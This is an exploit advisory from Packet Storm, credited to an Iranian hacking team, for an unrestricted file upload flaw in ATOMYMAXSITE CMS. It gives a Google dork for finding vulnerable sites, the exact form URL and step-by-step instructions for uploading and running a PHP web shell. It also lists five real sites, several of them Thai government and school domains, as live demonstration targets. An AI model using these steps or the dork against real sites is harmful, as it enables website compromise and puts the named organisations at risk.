Sites powered by ATOMYMAXSITE appear to suffer from a remote shell upload vulnerability.
d379da817df77aaeadcc98a86b9e17fdf60ec6d4b1849e11e8c49f2fe3c406da#######################################################
#
# [+] Exploit Title: ATOMYMAXSITE CMS Remote Shell Upload Vulnerability
# [+] Google Dork: "Powered by ATOMYMAXSITE"
# [+] Date: 30/06/2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Vendor Homepage: http://board.maxsitepro.com
# [+] Version: All Version [1.50 - 2.5]
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] Exploit:
#
# [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
#
#######################################################
#
# [+] Proof:
#
# [+] http://localhost/[path]/index.php?name=research&file=add&op=research_add
# [+] Then fill in all the information requested
# [+] Now click on the Browse front of ผลงานฉบับเต็ม(Fultext) and select shell.php
# [+] Now click on the button below the form to be registered
# [+] http://localhost/[path]/index.php?name=research
# [+] Now select the first record and click the (FullText)
# [+] (FullText) = Path shell.php
#
#######################################################
#
# [+] Demo site:
#
# [+] http://plan.chon1.go.th
# [+] http://tbacud.ac.th
# [+] http://www.nitedcpm1.net
# [+] http://ict.chon1.go.th/home/
# [+] http://www.chiangdaocity.go.th/home
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313
# [+] Home : http://www.idc-team.net
#
#######################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed